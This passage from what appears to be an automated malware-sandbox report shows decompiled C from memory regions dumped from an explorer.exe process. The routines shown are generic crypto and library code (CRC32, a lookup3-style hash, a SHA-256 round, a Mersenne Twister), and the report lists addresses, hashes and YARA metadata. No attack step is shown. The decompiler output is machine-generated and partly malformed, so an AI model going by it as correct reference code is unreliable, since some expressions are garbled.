^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x40a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x40a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (( *(0x409cd8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x40a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x18) * 4) ^  *(0x40a4d8 + (_t101 & 0x000000ff) * 4) ^  *(_t175 + 0xc)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (( *(0x409cd8 + (( *(0x409cd8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x40a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x40a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (( *(0x409cd8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x40a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x18) * 4) ^  *(0x40a4d8 + (_t101 & 0x000000ff) * 4) ^  *(_t175 + 0xc)) >> 0x18) * 4) ^  *(0x40a4d8 + (_t198 & 0x000000ff) * 4) ^  *(_t175 + 0x10)) >> 0x18) * 4) ^  *(0x40a4d8 + (_t110 & 0x000000ff) * 4) ^  *(_t175 + 0x14);
						_t175 = _t175 + 0x20;
						_t119 =  *(0x409cd8 + (_t207 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (_t207 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (_t207 >> 0x18) * 4) ^  *(0x40a4d8 + (_t207 & 0x000000ff) * 4) ^  *(_t175 - 8);
						_t232 = _t232 - 0x20;
						_t87 =  *(0x409cd8 + (( *(0x409cd8 + (( *(0x409cd8 + (_t207 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (_t207 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (_t207 >> 0x18) * 4) ^  *(0x40a4d8 + (_t207 & 0x000000ff) * 4) ^  *(_t175 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + (_t207 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (_t207 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (_t207 >> 0x18) * 4) ^  *(0x40a4d8 + (_t207 & 0x000000ff) * 4) ^  *(_t175 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (_t119 >> 0x18) * 4) ^  *(0x40a4d8 + (_t119 & 0x000000ff) * 4) ^  *(_t175 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + (( *(0x409cd8 + (_t207 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (_t207 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (_t207 >> 0x18) * 4) ^  *(0x40a4d8 + (_t207 & 0x000000ff) * 4) ^  *(_t175 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + (_t207 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (_t207 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (_t207 >> 0x18) * 4) ^  *(0x40a4d8 + (_t207 & 0x000000ff) * 4) ^  *(_t175 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (_t119 >> 0x18) * 4) ^  *(0x40a4d8 + (_t119 & 0x000000ff) * 4) ^  *(_t175 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (( *(0x409cd8 + (( *(0x409cd8 + (_t207 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (_t207 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (_t207 >> 0x18) * 4) ^  *(0x40a4d8 + (_t207 & 0x000000ff) * 4) ^  *(_t175 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + (_t207 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (_t207 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (_t207 >> 0x18) * 4) ^  *(0x40a4d8 + (_t207 & 0x000000ff) * 4) ^  *(_t175 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (_t119 >> 0x18) * 4) ^  *(0x40a4d8 + (_t119 & 0x000000ff) * 4) ^  *(_t175 - 4)) >> 0x18) * 4) ^  *(0x40a4d8 + (_t216 & 0x000000ff) * 4);
						_t231 = _t231 - 1;
					} while (_t231 != 0);
				}
				if(_t232 >= 4) {
					_t181 = _t232 >> 2;
					do {
						_t90 = _t87 ^  *_t175;
						_t175 = _t175 + 4;
						_t232 = _t232 - 4;
						_t181 = _t181 - 1;
						_t87 =  *(0x409cd8 + (_t90 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (_t90 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (_t90 >> 0x18) * 4) ^  *(0x40a4d8 + (_t90 & 0x000000ff) * 4);
					} while (_t181 != 0);
				}
				if(_t232 != 0) {
					do {
						_t87 = _t87 >> 0x00000008 ^  *(0x4098d8 + (( *_t175 & 0x000000ff ^ _t87) & 0x000000ff) * 4);
						_t175 = _t175 + 1;
						_t232 = _t232 - 1;
					} while (_t232 != 0);
				}
				return  !_t87;
			}

0x00403120
0x00403121
0x00403123
0x00403127
0x00403130
0x00403143
0x0040314a
0x0040314b
0x0040314c
0x00000000
0x00000000
0x00000000
0x0040314c
0x00403130
0x0040314e
0x00403153
0x0040315b
0x00403160
0x0040329a
0x004032d9
0x004032dc
0x004032df
0x00403356
0x0040335d
0x0040335d
0x00403160
0x00403367
0x0040336b
0x00403370
0x00403370
0x00403372
0x004033b1
0x004033b4
0x004033b5
0x004033b5
0x00403370
0x004033bd
0x004033c0
0x004033ce
0x004033d5
0x004033d6
0x004033d6
0x004033c0
0x004033dc

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd3d42a0d596c169830b1d3c30454b62ab93d4bc53a55231a58906fcc927cd00
Instruction ID: 2397274b823e6b1eccec1fbc01579ce330bc4b01805827928150bc04234b9f5c
Opcode Fuzzy Hash: bd3d42a0d596c169830b1d3c30454b62ab93d4bc53a55231a58906fcc927cd00
Instruction Fuzzy Hash: 59616436A6265347E350DF6DFDC07263392E7CA301F1D8531CA009B7A7C639EA729688

Uniqueness

Uniqueness Score: 0.00%

Function 01523C50, Relevance: .2, Instructions: 168
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E01523C50(void* __ecx, signed char* _a4, signed int _a8) {
				intOrPtr _v8;
				signed int _t43;
				signed int _t76;
				void* _t77;
				signed int _t81;
				signed int _t85;
				signed int _t88;
				signed char* _t90;
				signed int _t94;
				signed int _t123;
				void* _t124;
				signed int _t128;
				signed int _t132;
				signed int _t134;
				signed int _t136;
				intOrPtr _t141;
				signed int _t144;
				void* _t145;
				signed int _t148;
				signed int _t152;
				signed int _t154;
				signed int _t168;
				void* _t169;
				signed int _t171;

				_push(__ecx);
				_t43 = _a8;
				_t128 = _t43 + __ecx - 0x21524111;
				_t90 = _a4;
				_t148 = _t128;
				_t81 = _t128;
				if(_t43 <= 0xc) {
					L5:
					switch( *((intOrPtr*)(_t43 * 4 +  &M01523E04))) {
						case 0:
							_pop(__edi);
							return __edi;
							goto L20;
						case 1:
							L17:
							_t85 = _t84 + ( *_t90 & 0x000000ff);
							goto L18;
						case 2:
							L16:
							_t84 = _t83 + ((_t90[1] & 0x000000ff) << 8);
							goto L17;
						case 3:
							L15:
							_t83 = _t82 + ((_t90[2] & 0x000000ff) << 0x10);
							goto L16;
						case 4:
							L14:
							_t82 = _t81 + ((_t90[3] & 0x000000ff) << 0x18);
							goto L15;
						case 5:
							L13:
							_t152 = _t151 + (_t90[4] & 0x000000ff);
							goto L14;
						case 6:
							L12:
							_t151 = _t150 + ((_t90[5] & 0x000000ff) << 8);
							goto L13;
						case 7:
							L11:
							_t150 = _t149 + ((_t90[6] & 0x000000ff) << 0x10);
							goto L12;
						case 8:
							L10:
							_t149 = _t148 + ((_t90[7] & 0x000000ff) << 0x18);
							goto L11;
						case 9:
							L9:
							_t132 = _t131 + (_t90[8] & 0x000000ff);
							goto L10;
						case 0xa:
							L8:
							_t131 = _t130 + ((_t90[9] & 0x000000ff) << 8);
							goto L9;
						case 0xb:
							L7:
							_t130 = _t129 + ((_t90[0xa] & 0x000000ff) << 0x10);
							goto L8;
						case 0xc:
							_t32 =  &(_t90[0xb]); // 0x458959ff
							_t129 = _t128 + (( *_t32 & 0x000000ff) << 0x18);
							goto L7;
					}
				} else {
					_a4 = (0xaaaaaaab * (_t43 - 0xd) >> 0x20 >> 3) + 1;
					do {
						_t11 =  &(_t90[7]); // 0xffc88305
						_t12 =  &(_t90[6]); // 0xc8830575
						_t13 =  &(_t90[5]); // 0x830575c6
						_t14 =  &(_t90[4]); // 0x575c63b
						_t15 =  &(_t90[0xb]); // 0x75ff7feb
						_t16 =  &(_t90[3]); // 0x75c63bf4
						_v8 = ( *_t14 & 0x000000ff) + _t148 + (((( *_t11 & 0x000000ff) << 8) + ( *_t12 & 0x000000ff) << 8) + ( *_t13 & 0x000000ff) << 8);
						_t18 =  &(_t90[0xa]); // 0xff7febff
						_t19 =  &(_t90[9]); // 0x7febffc8
						_t20 =  &(_t90[8]); // 0xebffc883
						_t21 =  &(_t90[2]); // 0xc63bf445
						_t22 =  &(_t90[1]); // 0x3bf44589
						_t141 = _v8;
						_t123 = ( *_t20 & 0x000000ff) + _t128 + (((( *_t15 & 0x000000ff) << 8) + ( *_t18 & 0x000000ff) << 8) + ( *_t19 & 0x000000ff) << 8);
						asm("rol eax, 0x4");
						_t76 = _t123 ^ (((( *_t16 & 0x000000ff) << 0x00000008) + ( *_t21 & 0x000000ff) << 0x00000008) + ( *_t22 & 0x000000ff) << 0x00000008) + ( *_t90 & 0x000000ff) - _t123 + _t81;
						_t124 = _t123 + _t141;
						asm("rol esi, 0x6");
						_t168 = _t76 ^ _t141 - _t76;
						_a8 = _a8 - 0xc;
						_t77 = _t76 + _t124;
						asm("rol edi, 0x8");
						_t144 = _t168 ^ _t124 - _t168;
						_t169 = _t168 + _t77;
						asm("rol ebx, 0x10");
						_t88 = _t144 ^ _t77 - _t144;
						_t145 = _t144 + _t169;
						asm("ror eax, 0xd");
						_t171 = _t169 - _t88 ^ _t88;
						_t81 = _t88 + _t145;
						asm("rol edx, 0x4");
						_t128 = _t145 - _t171 ^ _t171;
						_t148 = _t171 + _t81;
						_t90 =  &(_t90[0xc]);
						_t26 =  &_a4;
						 *_t26 = _a4 - 1;
					} while ( *_t26 != 0);
					if(_a8 > 0xc) {
						L18:
						asm("rol edx, 0xe");
						_t134 = (_t132 ^ _t152) - _t152;
						asm("rol eax, 0xb");
						_t94 = (_t134 ^ _t85) - _t134;
						asm("ror edx, 0x7");
						_t154 = (_t152 ^ _t94) - _t94;
						asm("rol eax, 0x10");
						_t136 = (_t134 ^ _t154) - _t154;
						_t58 = _t136;
						asm("rol edi, 0x4");
						asm("rol ecx, 0xe");
						asm("ror edx, 0x8");
						return (_t136 ^ (_t154 ^ (_t58 ^ _t94) - _t136) - (_t58 ^ _t94) - _t136) - (_t154 ^ (_t58 ^ _t94) - _t136) - (_t58 ^ _t94) - _t136;
					} else {
						_t43 = _a8;
						goto L5;
					}
				}
				L20:
			}

0x01523c53
0x01523c54
0x01523c5a
0x01523c61
0x01523c64
0x01523c66
0x01523c6b
0x01523d45
0x01523d45
0x00000000
0x01523dfa
0x01523e00
0x00000000
0x00000000
0x01523da9
0x01523dac
0x00000000
0x00000000
0x01523da0
0x01523da7
0x00000000
0x00000000
0x01523d97
0x01523d9e
0x00000000
0x00000000
0x01523d8e
0x01523d95
0x00000000
0x00000000
0x01523d88
0x01523d8c
0x00000000
0x00000000
0x01523d7f
0x01523d86
0x00000000
0x00000000
0x01523d76
0x01523d7d
0x00000000
0x00000000
0x01523d6d
0x01523d74
0x00000000
0x00000000
0x01523d67
0x01523d6b
0x00000000
0x00000000
0x01523d5e
0x01523d65
0x00000000
0x00000000
0x01523d55
0x01523d5c
0x00000000
0x00000000
0x01523d4c
0x01523d53
0x00000000
0x00000000
0x01523c71
0x01523c7f
0x01523c82
0x01523c82
0x01523c86
0x01523c8f
0x01523c98
0x01523ca3
0x01523ca7
0x01523cae
0x01523cb1
0x01523cb7
0x01523cc0
0x01523cc6
0x01523ccf
0x01523ce0
0x01523ce6
0x01523cee
0x01523cf1
0x01523cf3
0x01523cf9
0x01523cfc
0x01523cfe
0x01523d02
0x01523d08
0x01523d0b
0x01523d0d
0x01523d13
0x01523d16
0x01523d18
0x01523d1e
0x01523d21
0x01523d23
0x01523d29
0x01523d2c
0x01523d2e
0x01523d30
0x01523d33
0x01523d33
0x01523d33
0x01523d40
0x01523dae
0x01523db2
0x01523db5
0x01523db9
0x01523dc0
0x01523dc6
0x01523dc9
0x01523dcf
0x01523dd2
0x01523dd4
0x01523dd6
0x01523de3
0x01523ded
0x01523df7
0x01523d42
0x01523d42
0x00000000
0x01523d42
0x01523d40
0x00000000

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e615a4f8eacac5775a428f276c21042e64f77d26ed2deaeaa67a00ca04566366
Instruction ID: f8cce1dee411beabc37b04d49ab8e9c83f938645ee86dbd024a1e54094533fed
Opcode Fuzzy Hash: e615a4f8eacac5775a428f276c21042e64f77d26ed2deaeaa67a00ca04566366
Instruction Fuzzy Hash: 7E5185B3B081B007D765853F9C54165FAD39EC605531EC2AAE8ACDB74AE43BCB079B90

Uniqueness

Uniqueness Score: 0.00%

Function 015131DC, Relevance: .1, Instructions: 122
COMMONCrypto

Download Yara Rule

C-Code - Quality: 76%

			E015131DC(void* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void _v36;
				void* _v40;
				char _v240;
				void* _t50;
				signed char* _t51;
				signed int* _t52;
				void* _t59;
				void* _t66;
				signed int _t72;
				signed int _t74;
				signed int _t90;
				void* _t103;
				void* _t113;
				void* _t121;
				void* _t125;
				signed int _t126;
				void* _t131;

				_t121 = __ecx + 8;
				_t72 = 8;
				_v40 = _t121;
				_t50 = memcpy( &_v36, _t121, _t72 << 2);
				_t74 = 0;
				_t51 = _t50 + 2;
				do {
					 *(_t131 + _t74 * 4 - 0x124) = ((( *(_t51 - 2) & 0x000000ff) << 0x00000008 |  *(_t51 - 1) & 0x000000ff) << 0x00000008 |  *_t51 & 0x000000ff) << 0x00000008 | _t51[1] & 0x000000ff;
					_t74 = _t74 + 1;
					_t51 =  &(_t51[4]);
				} while (_t74 < 0x10);
				_t125 = 0x30;
				_t52 =  &_v240;
				do {
					_t98 =  *_t52;
					_t75 =  *(_t52 - 0x34);
					asm("ror edi, 0x13");
					asm("ror ebx, 0x11");
					asm("ror edx, 0x12");
					asm("ror ebx, 0x7");
					_t113 = ( *_t52 ^  *_t52 ^ _t98 >> 0x0000000a) + ( *(_t52 - 0x34) ^  *(_t52 - 0x34) ^ _t75 >> 0x00000003) +  *((intOrPtr*)(_t52 - 0x38));
					_t52 =  &(_t52[1]);
					_t125 = _t125 - 1;
					_t52[1] = _t113 +  *((intOrPtr*)(_t52 - 0x18));
				} while (_t125 != 0);
				_t126 = _v20;
				_t103 = 0;
				do {
					asm("ror eax, 0x19");
					asm("ror ecx, 0xb");
					asm("ror ecx, 0x6");
					_t103 = _t103 + 4;
					_t127 = _v36;
					_t21 = _t103 + 0x152c16c; // 0x632e
					_t59 = (_t126 ^ _t126 ^ _t126) + ((_v16 ^ _v12) & _t126 ^ _v12) +  *_t21 +  *((intOrPtr*)(_t131 + _t103 - 0x128)) + _v8;
					_v24 = _v24 + _t59;
					asm("ror edi, 0x16");
					asm("ror ecx, 0xd");
					asm("ror ecx, 0x2");
					_v8 = _v12;
					_v12 = _v16;
					_v16 = _v20;
					_t126 = _v24;
					_v24 = _v28;
					_v28 = _v32;
					_v20 = _t126;
					_v32 = _v36;
					_v36 = ((_v32 | _v36) & _v28 | _v32 & _v36) + (_v36 ^ _t127 ^ _t127) + _t59;
				} while (_t103 < 0x100);
				_t66 = _v40;
				_t90 = 0;
				do {
					 *_t66 =  *_t66 +  *((intOrPtr*)(_t131 + _t90 * 4 - 0x20));
					_t90 = _t90 + 1;
					_t66 = _t66 + 4;
				} while (_t90 < 8);
				return _t66;
			}

0x015131e7
0x015131ec
0x015131f0
0x015131f3
0x015131f5
0x015131f7
0x015131fa
0x01513218
0x0151321f
0x01513220
0x01513223
0x0151322a
0x0151322b
0x01513232
0x01513232
0x01513234
0x01513239
0x01513241
0x0151324a
0x0151324f
0x0151325b
0x0151325e
0x01513264
0x01513265
0x01513265
0x0151326a
0x0151326d
0x01513270
0x01513272
0x01513277
0x0151327e
0x01513289
0x01513291
0x01513296
0x015132a7
0x015132aa
0x015132ad
0x015132b0
0x015132b7
0x015132cf
0x015132d5
0x015132db
0x015132e3
0x015132e6
0x015132ee
0x015132f4
0x015132f7
0x015132fa
0x015132fd
0x01513309
0x0151330d
0x01513310
0x01513314
0x01513316
0x01513317
0x0151331a
0x01513320

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff2b1513a3841e16c1637a748b016a62a25431227ee99032997114f3a3d9d161
Instruction ID: 85c85653ae44ca4eefaf5aaca3edac50cb8e26fd4cfc7e6383ebbcbaa8342fea
Opcode Fuzzy Hash: ff2b1513a3841e16c1637a748b016a62a25431227ee99032997114f3a3d9d161
Instruction Fuzzy Hash: 66417172E002288FEF48CF59D8565EEB7F2FB88314F15806AD556F7345CA34A942CB90

Uniqueness

Uniqueness Score: 0.00%

Function 01515530, Relevance: .1, Instructions: 114
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 100%

			E01515530(signed int* _a4) {
				unsigned int _v8;
				signed int _v12;

				if(_a4[0x270] >= 0x270) {
					_v12 = 0;
					while(_v12 < 0xe3) {
						_v8 = _a4[_v12] & 0x80000000 |  *(_a4 + 4 + _v12 * 4) & 0x7fffffff;
						_a4[_v12] = _v8 >> 0x00000001 ^  *(_a4 + 0x634 + _v12 * 4) ^  *(0x15363f4 + (_v8 & 0x00000001) * 4);
						_v12 = _v12 + 1;
					}
					while(_v12 < 0x26f) {
						_v8 = _a4[_v12] & 0x80000000 |  *(_a4 + 4 + _v12 * 4) & 0x7fffffff;
						_a4[_v12] = _v8 >> 0x00000001 ^  *(_a4 + _v12 * 4 - 0x38c) ^  *(0x15363f4 + (_v8 & 0x00000001) * 4);
						_v12 = _v12 + 1;
					}
					_v8 = _a4[0x26f] & 0x80000000 |  *_a4 & 0x7fffffff;
					_a4[0x26f] = _v8 >> 0x00000001 ^ _a4[0x18c] ^  *(0x15363f4 + (_v8 & 0x00000001) * 4);
					_a4[0x270] = 0;
				}
				_t71 =  &(_a4[0x270]); // 0x500845b7
				_v8 = _a4[ *_t71];
				_t77 =  &(_a4[0x270]); // 0x500845b7
				_a4[0x270] =  *_t77 + 1;
				_v8 = _v8 >> 0x0000000b ^ _v8;
				_v8 = _v8 << 0x00000007 & 0x9d2c5680 ^ _v8;
				_v8 = _v8 << 0x0000000f & 0xefc60000 ^ _v8;
				_v8 = _v8 >> 0x00000012 ^ _v8;
				return _v8;
			}

0x01515543
0x01515549
0x0151555b
0x01515585
0x015155ad
0x01515558
0x01515558
0x015155bd
0x015155e6
0x0151560e
0x015155ba
0x015155ba
0x0151562e
0x0151564f
0x01515658
0x01515658
0x01515665
0x01515671
0x01515677
0x01515683
0x01515692
0x015156a3
0x015156b5
0x015156c1
0x015156ca

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d0c1081472ed5acc6f6799418ad09a75a27bef8a11beb8fc6416df765c2653d
Instruction ID: fa6134f7f8b8ccbd0d1300a13c50b87bab6a216d8b95dfc3ad9389466a7c5b71
Opcode Fuzzy Hash: 6d0c1081472ed5acc6f6799418ad09a75a27bef8a11beb8fc6416df765c2653d
Instruction Fuzzy Hash: 1751F974A11209EFDB04CF48C194AADBBB2FF88310F2582A8D8469F345C731AB51DF80

Uniqueness

Uniqueness Score: 0.00%

Function 003F88B0, Relevance: .1, Instructions: 114
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 100%

			E003F88B0(signed int* _a4) {
				unsigned int _v8;
				signed int _v12;

				if(_a4[0x270] >= 0x270) {
					_v12 = 0;
					while(_v12 < 0xe3) {
						_v8 = _a4[_v12] & 0x80000000 |  *(_a4 + 4 + _v12 * 4) & 0x7fffffff;
						_a4[_v12] = _v8 >> 0x00000001 ^  *(_a4 + 0x634 + _v12 * 4) ^  *(0x40f2ac + (_v8 & 0x00000001) * 4);
						_v12 = _v12 + 1;
					}
					while(_v12 < 0x26f) {
						_v8 = _a4[_v12] & 0x80000000 |  *(_a4 + 4 + _v12 * 4) & 0x7fffffff;
						_a4[_v12] = _v8 >> 0x00000001 ^  *(_a4 + _v12 * 4 - 0x38c) ^  *(0x40f2ac + (_v8 & 0x00000001) * 4);
						_v12 = _v12 + 1;
					}
					_v8 = _a4[0x26f] & 0x80000000 |  *_a4 & 0x7fffffff;
					_a4[0x26f] = _v8 >> 0x00000001 ^ _a4[0x18c] ^  *(0x40f2ac + (_v8 & 0x00000001) * 4);
					_a4[0x270] = 0;
				}
				_t71 =  &(_a4[0x270]); // 0x74000040
				_v8 = _a4[ *_t71];
				_t77 =  &(_a4[0x270]); // 0x74000040
				_a4[0x270] =  *_t77 + 1;
				_v8 = _v8 >> 0x0000000b ^ _v8;
